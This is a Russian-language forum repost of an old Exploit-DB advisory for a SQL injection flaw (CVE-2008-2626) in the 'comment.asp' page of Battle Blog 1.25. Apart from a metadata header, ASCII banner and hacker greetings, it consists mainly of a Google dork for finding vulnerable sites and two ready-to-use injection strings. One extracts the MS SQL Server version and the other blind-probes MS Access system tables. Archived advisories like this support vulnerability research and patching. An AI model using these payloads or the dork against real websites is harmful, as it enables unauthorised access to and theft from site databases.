Exploit Battle Blog 1.25 - 'comment.asp' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5731
Проверка EDB
  1. Пройдено
Автор
BL@CKBE@RD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2626
Дата публикации
2008-06-03
Код:
+************************************************************************************************************************+
| hhh  hhh          aa          ccccccc      kk  k      EEEEEEEE       RRRR                    TTTTTTTT      NNN   NN    |
| hhh  hhh        aa  aa        cc           kk k       E              RR  R    -----------       TT         NN N  NN    |
| hhhhhhhh       aaaaaaaa       cc           kkk        EEEEEEE        RR R     -----------       TT         NN  N NN    |
| hhh  hhh     aa       aa      cc           kk k       E              RR  R                      TT         NN   NNN    |
| hhh  hhh    aa         aa     ccccccc      kk  k      EEEEEEE        RR   R                     TT         NN    NN    |
|                                                                                                                        |
+************************************************************************************************************************+

[+] Script Name    : Battle Blog <= V 1.25

[+] Script In Short: ('Battle Blog's "real world" preview feature allows you to view your posting within the actual context of your presentation and customized style sheet before you've published it, or, while you're making edits to a current entry.');

[+] Found by       : Bl@ckbe@rD ('Tunisian TerrorisT') ;

[+] Google dork    : "Powered by Battle Blog" ;

[+] Script URL     : webscripts.softpedia.com/script/Blog/Battle-Blog--31261.html ;

[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;

--//-->

[+] Expl0iT :

/comment.asp?entry={SQL}

-----> For MS SQL Server         : 22+and+1=convert(int,(select+@@version))--

-----> For Ms ACCESS (Blind-Way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00

--//-->

[+] GrEEtZ : allah , hak3r-b0y , UnderZ0ne Crew , InjEct0rS Team 

# milw0rm.com [2008-06-03]
 
Источник
www.exploit-db.com

Похожие темы